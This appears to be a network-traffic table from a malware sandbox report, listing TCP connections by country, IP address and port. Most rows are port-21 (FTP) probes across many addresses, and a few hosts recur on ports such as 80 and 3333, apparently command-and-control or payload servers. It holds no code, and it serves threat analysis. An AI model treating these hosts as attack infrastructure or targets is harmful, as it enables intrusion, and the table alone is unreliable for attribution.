| KR | 14.87.89.1:21 | tcp | |
| TN | 102.171.150.1:21 | tcp | |
| US | 216.103.58.1:21 | tcp | |
| JP | 163.45.75.1:21 | tcp | |
| IQ | 178.22.39.1:21 | tcp | |
| AU | 220.239.133.1:21 | tcp | |
| FR | 176.166.17.1:21 | tcp | |
| NL | 145.1.21.1:21 | tcp | |
| NL | 204.2.77.1:21 | tcp | |
| CA | 208.78.16.1:21 | tcp | |
| JP | 1.79.77.1:21 | tcp | |
| US | 215.211.60.1:21 | tcp | |
| US | 130.213.181.1:21 | tcp | |
| US | 132.96.0.1:21 | tcp | |
| CO | 191.95.24.1:21 | tcp | |
| US | 29.100.190.1:21 | tcp | |
| CN | 112.103.171.1:21 | tcp | |
| US | 71.239.133.1:21 | tcp | |
| QA | 86.37.145.1:21 | tcp | |
| NL | 145.45.20.1:21 | tcp | |
| AR | 190.190.233.1:21 | tcp | |
| US | 108.211.140.1:21 | tcp | |
| US | 168.108.182.1:21 | tcp | |
| CN | 171.218.81.1:21 | tcp | |
| CN | 117.11.61.1:21 | tcp | |
| PE | 200.89.21.1:21 | tcp | |
| FR | 90.9.47.1:21 | tcp | |
| IE | 54.74.55.1:21 | tcp | |
| US | 17.70.23.1:21 | tcp | |
| CN | 42.157.21.1:21 | tcp | |
| DE | 92.74.22.1:21 | tcp | |
| US | 54.163.120.1:21 | tcp | |
| CH | 57.190.81.1:21 | tcp | |
| US | 150.136.16.1:21 | tcp | |
| BR | 200.178.32.1:21 | tcp | |
| KR | 27.101.125.1:21 | tcp | |
| IN | 49.32.227.1:21 | tcp | |
| DE | 91.31.144.1:21 | tcp | |
| BR | 200.232.63.1:21 | tcp | |
| KR | 211.41.36.1:21 | tcp | |
| US | 68.177.116.1:21 | tcp | |
| TN | 197.19.89.1:21 | tcp | |
| US | 158.122.36.1:21 | tcp | |
| FR | 92.171.148.1:21 | tcp | |
| US | 30.31.209.1:21 | tcp | |
| CN | 119.178.156.1:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.117:3333 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 100.164.185.2:21 | tcp | |
| AU | 121.208.154.2:21 | tcp | |
| DE | 94.216.11.2:21 | tcp | |
| US | 167.180.2.2:21 | tcp | |
| US | 198.9.229.2:21 | tcp | |
| US | 162.231.88.2:21 | tcp | |
| KR | 42.35.11.2:21 | tcp | |
| US | 9.254.54.2:21 | tcp | |
| US | 134.156.230.2:21 | tcp | |
| US | 215.72.78.2:21 | tcp | |
| JP | 124.214.147.2:21 | tcp | |
| IN | 59.180.29.2:21 | tcp | |
| MY | 114.133.239.2:21 | tcp | |
| IT | 78.215.103.2:21 | tcp | |
| US | 166.135.41.2:21 | tcp | |
| CN | 120.236.252.2:21 | tcp | |
| US | 159.189.125.2:21 | tcp | |
| US | 44.99.6.2:21 | tcp | |
| KR | 14.80.236.2:21 | tcp | |
| US | 169.195.37.2:21 | tcp | |
| NL | 178.84.149.2:21 | tcp | |
| EG | 154.137.95.2:21 | tcp | |
| GB | 94.12.147.2:21 | tcp | |
| FR | 193.242.15.2:21 | tcp | |
| US | 44.13.169.2:21 | tcp | |
| ES | 37.158.249.2:21 | tcp | |
| US | 28.58.44.2:21 | tcp | |
| LU | 94.252.79.2:21 | tcp | |
| IE | 34.243.65.2:21 | tcp | |
| BR | 179.212.23.2:21 | tcp | |
| CN | 211.80.193.2:21 | tcp | |
| CN | 110.73.36.2:21 | tcp | |
| CA | 198.245.63.2:21 | tcp | |
| JP | 218.227.139.2:21 | tcp | |
| NL | 145.124.235.2:21 | tcp | |
| US | 17.53.245.2:21 | tcp | |
| ES | 178.57.162.2:21 | tcp | |
| US | 11.63.75.2:21 | tcp | |
| US | 32.68.223.2:21 | tcp | |
| US | 12.143.165.2:21 | tcp | |
| US | 50.10.28.2:21 | tcp | |
| US | 26.115.187.2:21 | tcp | |
| US | 192.223.46.2:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| SG | 43.5.11.2:21 | tcp | |
| DE | 178.25.205.2:21 | tcp | |
| US | 162.89.45.2:21 | tcp | |
| VN | 14.254.53.2:21 | tcp | |
| US | 29.1.125.2:21 | tcp | |
| MU | 102.232.152.2:21 | tcp | |
| CN | 121.39.192.2:21 | tcp | |
| JP | 220.156.237.2:21 | tcp | |
| US | 170.234.235.2:21 | tcp | |
| AU | 3.26.84.2:21 | tcp | |
| US | 103.144.3.2:21 | tcp | |
| CO | 190.251.3.2:21 | tcp | |
| CN | 123.244.204.2:21 | tcp | |
| ES | 90.169.104.2:21 | tcp | |
| US | 15.106.215.2:21 | tcp | |
| US | 108.242.234.2:21 | tcp | |
| CL | 201.239.238.2:21 | tcp | |
| TH | 171.7.174.2:21 | tcp | |
| GB | 195.79.81.2:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 53.211.166.2:21 | tcp | |
| CN | 106.42.31.65:8088 | tcp | |
| US | 15.91.193.2:21 | tcp | |
| EG | 154.181.211.2:21 | tcp | |
| US | 67.79.14.2:21 | tcp | |
| EG | 105.39.5.2:21 | tcp | |
| JP | 157.9.171.2:21 | tcp | |
| US | 104.22.229.2:21 | tcp | |
| BR | 177.106.95.2:21 | tcp | |
| US | 135.140.175.2:21 | tcp | |
| DE | 53.176.3.2:21 | tcp | |
| CN | 112.73.28.2:21 | tcp | |
| US | 144.107.249.2:21 | tcp | |
| KR | 118.61.196.2:21 | tcp | |
| CA | 198.168.233.2:21 | tcp | |
| SE | 164.48.209.2:21 | tcp | |
| RS | 160.99.213.2:21 | tcp | |
| CN | 1.204.114.2:21 | tcp | |
| CN | 116.113.222.2:21 | tcp | |
| UA | 178.151.53.2:21 | tcp | |
| US | 216.109.142.2:21 | tcp | |
| US | 108.50.96.2:21 | tcp | |
| US | 137.150.130.2:21 | tcp | |
| JP | 130.62.56.2:21 | tcp | |
| TW | 211.73.216.2:21 | tcp | |
| US | 55.64.232.2:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 89.105.201.183:2023 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 185.208.158.202:80 | bertbhz.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:40960 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 76.29.87.3:21 | tcp | |
| IN | 42.108.206.3:21 | tcp | |
| US | 170.144.144.3:21 | tcp | |
| US | 215.182.119.3:21 | tcp | |
| US | 74.176.97.3:21 | tcp | |
| FR | 91.91.193.3:21 | tcp | |
| US | 22.71.160.3:21 | tcp | |
| FR | 147.210.236.3:21 | tcp | |
| US | 4.141.168.3:21 | tcp | |
| CA | 24.78.237.3:21 | tcp | |
| US | 21.65.175.3:21 | tcp | |
| US | 70.220.255.3:21 | tcp | |
| BR | 177.158.5.3:21 | tcp | |
| US | 30.190.14.3:21 | tcp | |
| US | 214.228.161.3:21 | tcp | |
| DK | 87.55.10.3:21 | tcp | |
| CN | 61.241.104.3:21 | tcp | |
| US | 48.67.132.3:21 | tcp | |
| US | 174.235.179.3:21 | tcp | |
| SG | 47.129.207.3:21 | tcp | |
| US | 73.95.55.3:21 | tcp | |
| US | 199.0.217.3:21 | tcp | |
| US | 131.62.88.3:21 | tcp | |
| NL | 154.223.205.3:21 | tcp | |
| CO | 186.30.240.3:21 | tcp | |
| DE | 158.181.64.3:21 | tcp | |
| US | 96.57.142.3:21 | tcp | |
| US | 214.30.225.3:21 | tcp | |
| DE | 93.244.1.3:21 | tcp | |
| US | 71.143.2.3:21 | tcp | |
| NL | 94.214.19.3:21 | tcp | |
| SA | 151.255.157.3:21 | tcp | |
| US | 26.12.180.3:21 | tcp | |
| CN | 113.104.127.3:21 | tcp | |
| US | 23.209.155.3:21 | tcp | |
| US | 157.215.237.3:21 | tcp | |
| AE | 20.74.158.3:21 | tcp | |
| FR | 86.195.106.3:21 | tcp | |
| DE | 83.127.202.3:21 | tcp | |
| CA | 78.40.66.3:21 | tcp | |
| JP | 133.106.238.3:21 | tcp | |
| CA | 142.78.84.3:21 | tcp | |
| IT | 79.0.94.3:21 | tcp | |
| US | 12.23.108.3:21 | tcp | |
| JP | 111.238.1.3:21 | tcp | |
| US | 76.13.97.3:21 | tcp | |
| HK | 156.245.40.3:21 | tcp | |
| SE | 213.101.179.3:21 | tcp | |
| US | 214.174.251.3:21 | tcp | |
| US | 205.219.188.3:21 | tcp | |
| SE | 90.136.207.3:21 | tcp | |
| NL | 89.105.201.183:2023 | tcp | |
| FR | 92.134.69.3:21 | tcp | |
| CN | 113.246.137.3:21 | tcp | |
| NL | 145.15.203.3:21 | tcp | |
| US | 208.56.72.3:21 | tcp | |
| US | 8.95.13.3:21 | tcp | |
| CN | 103.50.58.3:21 | tcp | |
| MX | 187.189.57.3:21 | tcp | |
| US | 63.77.8.3:21 | tcp | |
| CN | 222.67.239.3:21 | tcp | |
| IT | 95.235.59.3:21 | tcp | |
| GB | 213.48.150.3:21 | tcp | |
| BR | 189.93.40.3:21 | tcp | |
| US | 206.31.52.3:21 | tcp | |
| US | 141.126.143.3:21 | tcp | |
| US | 214.38.123.3:21 | tcp | |
| FR | 139.124.170.3:21 | tcp | |
| ZA | 41.57.19.3:21 | tcp | |
| N/A | 10.119.189.3:21 | tcp | |
| BR | 177.7.191.3:21 | tcp | |
| GB | 92.207.170.3:21 | tcp | |
| IT | 2.236.240.3:21 | tcp | |
| NL | 145.11.132.3:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| HU | 31.5.178.3:21 | tcp | |
| US | 148.52.84.3:21 | tcp | |
| US | 149.82.196.3:21 | tcp | |
| IE | 212.147.218.3:21 | tcp | |
| FR | 163.69.230.3:21 | tcp | |
| EE | 185.195.23.3:21 | tcp | |
| IE | 34.252.199.3:21 | tcp | |
| SA | 93.112.195.3:21 | tcp | |
| US | 63.68.167.3:21 | tcp | |
| CN | 124.68.179.3:21 | tcp | |
| CN | 113.91.8.3:21 | tcp | |
| US | 171.148.239.3:21 | tcp | |
| US | 30.42.227.3:21 | tcp | |
| CA | 199.246.131.3:21 | tcp | |
| US | 17.215.36.3:21 | tcp | |
| US | 63.53.77.3:21 | tcp | |
| DE | 212.114.64.3:21 | tcp | |
| CH | 57.26.227.3:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 106.42.31.65:8088 | tcp | |
| US | 172.168.249.4:21 | tcp | |
| CN | 60.220.185.4:21 | tcp | |
| US | 15.45.217.4:21 | tcp | |
| US | 47.87.110.4:21 | tcp | |
| US | 164.91.193.4:21 | tcp | |
| US | 107.31.252.4:21 | tcp | |
| US | 129.130.62.4:21 | tcp | |
| DE | 91.15.114.4:21 | tcp | |
| US | 96.96.223.4:21 | tcp | |
| US | 64.150.7.4:21 | tcp | |
| CH | 188.154.137.4:21 | tcp | |
| KR | 175.233.126.4:21 | tcp | |
| US | 184.24.59.4:21 | tcp | |
| US | 9.37.240.4:21 | tcp | |
| KR | 112.178.92.4:21 | tcp | |
| NL | 145.188.90.4:21 | tcp | |
| GB | 146.169.175.4:21 | tcp | |
| JP | 133.179.214.4:21 | tcp | |
| DE | 5.100.56.4:21 | tcp | |
| BR | 200.132.232.4:21 | tcp | |
| CN | 149.41.165.4:21 | tcp | |
| CN | 39.183.144.4:21 | tcp | |
| BR | 187.112.93.4:21 | tcp | |
| US | 9.108.127.4:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 154.24.171.4:21 | tcp | |
| US | 20.32.9.4:21 | tcp | |
| MP | 172.225.241.4:21 | tcp | |
| US | 32.212.176.4:21 | tcp | |
| AT | 91.118.105.4:21 | tcp | |
| IE | 57.212.209.4:21 | tcp | |
| US | 73.177.120.4:21 | tcp | |
| VE | 181.181.63.4:21 | tcp | |
| PE | 191.98.183.4:21 | tcp | |
| SE | 62.119.46.4:21 | tcp | |
| FI | 139.97.156.4:21 | tcp | |
| US | 135.190.193.4:21 | tcp | |
| CN | 182.175.200.4:21 | tcp | |
| NG | 102.94.226.4:21 | tcp | |
| JP | 121.93.189.4:21 | tcp | |
| BE | 84.192.163.4:21 | tcp | |
| RU | 185.215.113.117:3333 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IE | 86.44.11.4:21 | tcp | |
| GB | 92.41.68.4:21 | tcp | |
| GB | 51.195.213.4:21 | tcp | |
| US | 209.65.41.4:21 | tcp | |
| US | 68.202.82.4:21 | tcp | |
| US | 47.151.63.4:21 | tcp | |
| TW | 223.200.30.4:21 | tcp | |
| US | 204.151.124.4:21 | tcp | |
| US | 50.42.99.4:21 | tcp | |
| DE | 89.183.22.4:21 | tcp | |
| FR | 83.193.147.4:21 | tcp | |
| US | 38.113.152.4:21 | tcp | |
| N/A | 100.103.32.4:21 | tcp | |
| BR | 179.55.161.4:21 | tcp | |
| N/A | 198.18.126.4:21 | tcp | |
| US | 73.108.46.4:21 | tcp | |
| CN | 111.18.165.4:21 | tcp | |
| CN | 162.14.182.4:21 | tcp | |
| AU | 1.149.232.4:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 30.189.78.4:21 | tcp | |
| SG | 47.237.116.4:21 | tcp | |
| JP | 49.98.245.4:21 | tcp | |
| JP | 133.241.152.4:21 | tcp | |
| IN | 3.108.201.4:21 | tcp | |
| CN | 122.97.177.4:21 | tcp | |
| PT | 89.152.221.4:21 | tcp | |
| DE | 46.30.62.4:21 | tcp | |
| KR | 211.118.85.4:21 | tcp | |
| US | 130.55.130.4:21 | tcp | |
| US | 74.244.216.4:21 | tcp | |
| US | 28.206.4.4:21 | tcp | |
| US | 72.192.238.4:21 | tcp | |
| US | 22.47.180.4:21 | tcp | |
| EE | 37.157.120.4:21 | tcp | |
| IR | 83.120.23.4:21 | tcp | |
| US | 172.251.219.4:21 | tcp | |
| JP | 202.227.27.4:21 | tcp | |
| GB | 31.69.144.4:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| GB | 25.103.10.4:21 | tcp | |
| US | 107.50.12.4:21 | tcp | |
| KE | 197.182.84.4:21 | tcp | |
| US | 173.10.116.4:21 | tcp | |
| TW | 110.28.203.4:21 | tcp | |
| US | 214.21.87.4:21 | tcp | |
| NL | 134.143.172.4:21 | tcp | |
| NL | 149.59.61.4:21 | tcp | |
| SA | 185.139.121.4:21 | tcp | |
| US | 35.117.235.4:21 | tcp | |
| US | 108.61.217.4:21 | tcp | |
| US | 50.236.249.4:21 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| CN | 119.18.194.4:21 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 119.91.25.19:8888 | tcp | |
| VN | 103.42.55.251:8080 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:40960 | tcp | |
| US | 33.29.175.5:21 | tcp | |
| CN | 222.69.89.5:21 | tcp | |
| US | 173.10.82.5:21 | tcp | |
| EG | 45.111.148.5:21 | tcp | |
| MX | 177.236.53.5:21 | tcp | |
| ES | 81.46.170.5:21 | tcp | |
| DE | 193.133.171.5:21 | tcp | |
| N/A | 10.13.206.5:21 | tcp | |
| GB | 176.27.75.5:21 | tcp | |
| US | 29.138.205.5:21 | tcp | |
| US | 47.38.191.5:21 | tcp | |
| US | 141.251.120.5:21 | tcp | |
| EG | 102.184.255.5:21 | tcp | |
| US | 48.227.93.5:21 | tcp | |
| CN | 123.90.14.5:21 | tcp | |
| US | 23.207.153.5:21 | tcp | |
| US | 207.80.72.5:21 | tcp | |
| US | 96.132.154.5:21 | tcp | |
| GB | 90.192.189.5:21 | tcp | |
| VN | 123.23.80.5:21 | tcp | |
| EG | 105.200.188.5:21 | tcp | |
| CN | 139.155.43.5:21 | tcp | |
| US | 198.46.227.5:21 | tcp | |
| US | 71.148.88.5:21 | tcp | |
| US | 19.48.93.5:21 | tcp | |
| CN | 115.211.191.5:21 | tcp | |
| AU | 146.178.96.5:21 | tcp | |
| US | 74.89.175.5:21 | tcp | |
| AU | 110.174.245.5:21 | tcp | |
| US | 155.220.239.5:21 | tcp | |
| US | 104.32.196.5:21 | tcp | |
| US | 184.14.135.5:21 | tcp | |
| FI | 141.172.223.5:21 | tcp | |
| CN | 106.19.147.5:21 | tcp | |
| DE | 84.133.121.5:21 | tcp | |
| VN | 14.252.219.5:21 | tcp | |
| DE | 63.191.109.5:21 | tcp | |
| DE | 87.145.242.5:21 | tcp | |
| US | 134.5.71.5:21 | tcp | |
| US | 64.211.37.5:21 | tcp | |
| UA | 109.254.88.5:21 | tcp | |
| AU | 1.155.63.5:21 | tcp | |
| US | 19.208.172.5:21 | tcp | |
| MX | 187.145.253.5:21 | tcp | |
| US | 30.215.57.5:21 | tcp | |
| US | 54.112.16.5:21 | tcp | |
| US | 98.237.180.5:21 | tcp | |
| US | 24.139.33.5:21 | tcp | |
| CL | 181.43.233.5:21 | tcp | |
| KR | 223.194.33.5:21 | tcp | |
| US | 169.69.190.5:21 | tcp | |
| EG | 41.131.215.5:21 | tcp | |
| US | 206.168.33.5:21 | tcp | |
| US | 32.149.241.5:21 | tcp | |
| US | 207.238.38.5:21 | tcp | |
| JP | 221.245.175.5:21 | tcp | |
| DE | 87.120.210.5:21 | tcp | |
| CA | 174.5.235.5:21 | tcp | |
| VE | 201.248.105.5:21 | tcp | |
| AU | 130.56.124.5:21 | tcp | |
| VE | 168.194.110.5:21 | tcp | |
| AE | 208.218.175.5:21 | tcp | |
| KE | 105.62.247.5:21 | tcp | |
| FI | 77.72.57.5:21 | tcp | |
| CN | 36.221.93.5:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| PL | 193.0.109.5:21 | tcp | |
| US | 71.84.64.5:21 | tcp | |
| US | 108.89.11.5:21 | tcp | |
| CH | 158.232.253.5:21 | tcp | |
| AR | 200.82.92.5:21 | tcp | |
| US | 26.50.114.5:21 | tcp | |
| BR | 200.110.205.5:21 | tcp | |
| US | 20.131.200.5:21 | tcp | |
| US | 199.39.213.5:21 | tcp | |
| CN | 101.17.72.5:21 | tcp | |
| IT | 95.234.127.5:21 | tcp | |
| CN | 119.10.42.5:21 | tcp | |
| IT | 151.50.103.5:21 | tcp | |
| CA | 138.11.60.5:21 | tcp | |
| NL | 145.195.163.5:21 | tcp | |
| KR | 119.208.98.5:21 | tcp | |
| US | 22.116.102.5:21 | tcp | |
| US | 158.29.91.5:21 | tcp | |
| US | 99.13.177.5:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 74.75.228.5:21 | tcp | |
| FR | 93.13.166.5:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 106.42.31.65:8088 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| EG | 156.169.171.6:21 | tcp | |
| DE | 86.56.101.6:21 | tcp | |
| US | 157.121.44.6:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 89.60.8.6:21 | tcp | |
| US | 74.223.95.6:21 | tcp | |
| CN | 58.206.33.6:21 | tcp | |
| US | 135.95.123.6:21 | tcp | |
| US | 72.145.147.6:21 | tcp | |
| GB | 94.12.3.6:21 | tcp | |
| US | 33.121.131.6:21 | tcp | |
| US | 65.85.167.6:21 | tcp | |
| JP | 126.103.134.6:21 | tcp | |
| US | 171.71.218.6:21 | tcp | |
| JP | 40.80.179.6:21 | tcp | |
| US | 167.174.53.6:21 | tcp | |
| US | 20.245.236.6:21 | tcp | |
| SE | 147.180.85.6:21 | tcp | |
| BE | 62.235.57.6:21 | tcp | |
| KZ | 46.42.234.6:21 | tcp | |
| CN | 59.246.67.6:21 | tcp | |
| TW | 223.22.243.6:21 | tcp | |
| US | 73.185.177.6:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 40.6.228.6:21 | tcp | |
| CN | 223.144.242.6:21 | tcp | |
| GB | 25.223.1.6:21 | tcp | |
| DE | 51.225.3.6:21 | tcp | |
| JP | 218.225.187.6:21 | tcp | |
| CN | 175.186.61.6:21 | tcp | |
| US | 160.253.36.6:21 | tcp | |
| CN | 115.52.178.6:21 | tcp | |
| US | 75.244.133.6:21 | tcp | |
| US | 167.107.59.6:21 | tcp | |
| JP | 153.214.177.6:21 | tcp | |
| DE | 62.55.176.6:21 | tcp | |
| US | 69.33.64.6:21 | tcp | |
| CN | 123.180.11.6:21 | tcp | |
| AT | 193.186.133.6:21 | tcp | |
| US | 128.218.221.6:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| PK | 39.60.195.6:21 | tcp | |
| US | 21.53.162.6:21 | tcp | |
| BR | 177.166.232.6:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 103.236.20.6:21 | tcp | |
| CO | 190.24.200.6:21 | tcp | |
| US | 55.72.146.6:21 | tcp | |
| CN | 175.43.138.6:21 | tcp | |
| MX | 187.222.37.6:21 | tcp | |
| US | 173.95.60.6:21 | tcp | |
| US | 159.66.212.6:21 | tcp | |
| FR | 92.183.15.6:21 | tcp | |
| DE | 37.92.38.6:21 | tcp | |
| US | 24.33.234.6:21 | tcp | |
| ZA | 197.83.170.6:21 | tcp | |
| US | 207.141.72.6:21 | tcp | |
| AU | 141.243.118.6:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IN | 115.111.71.6:21 | tcp | |
| IE | 193.178.69.6:21 | tcp | |
| US | 22.178.57.6:21 | tcp | |
| IN | 196.12.57.6:21 | tcp | |
| N/A | 100.103.152.6:21 | tcp | |
| SG | 27.104.233.6:21 | tcp | |
| RU | 176.208.230.6:21 | tcp | |
| US | 108.34.127.6:21 | tcp | |
| ID | 8.215.196.6:21 | tcp | |
| US | 99.189.88.6:21 | tcp | |
| KR | 112.221.101.6:21 | tcp | |
| US | 185.187.247.6:21 | tcp | |
| FR | 192.93.100.6:21 | tcp | |
| US | 19.30.113.6:21 | tcp | |
| US | 24.250.220.6:21 | tcp | |
| BG | 88.80.145.6:21 | tcp | |
| JP | 202.245.175.6:21 | tcp | |
| CA | 96.20.85.6:21 | tcp | |
| US | 16.192.24.6:21 | tcp | |
| US | 55.40.181.6:21 | tcp | |
| JP | 221.30.232.6:21 | tcp | |
| NL | 213.196.37.6:21 | tcp | |
| CN | 117.139.102.6:21 | tcp | |
| US | 72.36.117.6:21 | tcp | |
| CO | 190.146.4.6:21 | tcp | |
| JP | 124.240.229.6:21 | tcp | |
| DE | 53.171.189.6:21 | tcp | |
| CN | 121.17.126.6:21 | tcp | |
| US | 8.1.69.6:21 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.117:3333 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| NL | 154.213.187.170:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| JP | 60.66.99.7:21 | tcp | |
| US | 33.208.106.7:21 | tcp | |
| CN | 124.90.130.7:21 | tcp | |
| US | 64.222.49.7:21 | tcp | |
| TW | 203.74.225.7:21 | tcp | |
| ES | 87.220.49.7:21 | tcp | |
| GR | 62.1.115.7:21 | tcp | |
| RO | 95.76.1.7:21 | tcp | |
| CN | 122.136.179.7:21 | tcp | |
| CI | 196.180.246.7:21 | tcp | |
| CN | 175.73.97.7:21 | tcp | |
| JP | 218.228.236.7:21 | tcp | |
| GB | 25.57.81.7:21 | tcp | |
| BE | 178.50.76.7:21 | tcp | |
| NL | 156.150.167.7:21 | tcp | |
| FR | 2.4.90.7:21 | tcp | |
| KR | 119.192.48.7:21 | tcp | |
| US | 11.226.191.7:21 | tcp | |
| US | 159.61.166.7:21 | tcp | |
| US | 99.140.134.7:21 | tcp | |
| MD | 94.243.83.7:21 | tcp | |
| US | 107.149.189.7:21 | tcp | |
| US | 23.23.82.7:21 | tcp | |
| ST | 197.159.190.7:21 | tcp | |
| US | 48.123.45.7:21 | tcp | |
| JP | 14.15.129.7:21 | tcp | |
| JP | 106.163.172.7:21 | tcp | |
| JP | 221.49.80.7:21 | tcp | |
| PL | 188.33.80.7:21 | tcp | |
| US | 185.178.203.7:21 | tcp | |
| US | 198.132.177.7:21 | tcp | |
| US | 216.214.100.7:21 | tcp | |
| US | 184.130.50.7:21 | tcp | |
| US | 50.239.106.7:21 | tcp | |
| US | 20.177.37.7:21 | tcp | |
| KR | 49.163.24.7:21 | tcp | |
| BE | 193.245.46.7:21 | tcp | |
| CN | 36.27.224.7:21 | tcp | |
| US | 13.103.155.7:21 | tcp | |
| US | 64.65.252.7:21 | tcp | |
| US | 204.246.206.7:21 | tcp | |
| US | 97.129.243.7:21 | tcp | |
| ID | 36.95.220.7:21 | tcp | |
| US | 154.6.123.7:21 | tcp | |
| CN | 14.216.52.7:21 | tcp | |
| US | 168.246.229.7:21 | tcp | |
| US | 209.135.226.7:21 | tcp | |
| US | 21.136.89.7:21 | tcp | |
| FR | 90.123.15.7:21 | tcp | |
| US | 30.232.41.7:21 | tcp | |
| JP | 219.26.96.7:21 | tcp | |
| HK | 154.80.217.7:21 | tcp | |
| US | 149.83.36.7:21 | tcp | |
| BR | 191.227.118.7:21 | tcp | |
| N/A | 10.149.31.7:21 | tcp | |
| US | 108.65.221.7:21 | tcp | |
| KR | 110.11.241.7:21 | tcp | |
| IN | 49.42.94.7:21 | tcp | |
| KR | 123.229.237.7:21 | tcp | |
| US | 150.174.114.7:21 | tcp | |
| US | 15.83.22.7:21 | tcp | |
| TW | 223.22.12.7:21 | tcp | |
| ES | 88.11.17.7:21 | tcp | |
| US | 214.46.203.7:21 | tcp | |
| SE | 81.228.52.7:21 | tcp | |
| CN | 101.130.127.7:21 | tcp | |
| CD | 102.68.152.7:21 | tcp | |
| NO | 139.109.207.7:21 | tcp | |
| EG | 41.37.187.7:21 | tcp | |
| FI | 37.219.226.7:21 | tcp | |
| NO | 128.39.177.7:21 | tcp | |
| US | 136.147.68.7:21 | tcp | |
| GB | 151.104.39.7:21 | tcp | |
| PK | 39.54.78.7:21 | tcp | |
| ZA | 102.32.19.7:21 | tcp | |
| AU | 130.102.45.7:21 | tcp | |
| US | 64.221.53.7:21 | tcp | |
| US | 18.223.135.7:21 | tcp | |
| US | 16.192.40.7:21 | tcp | |
| US | 55.50.194.7:21 | tcp | |
| MX | 148.243.170.7:21 | tcp | |
| US | 169.19.95.7:21 | tcp | |
| JP | 219.16.11.7:21 | tcp | |
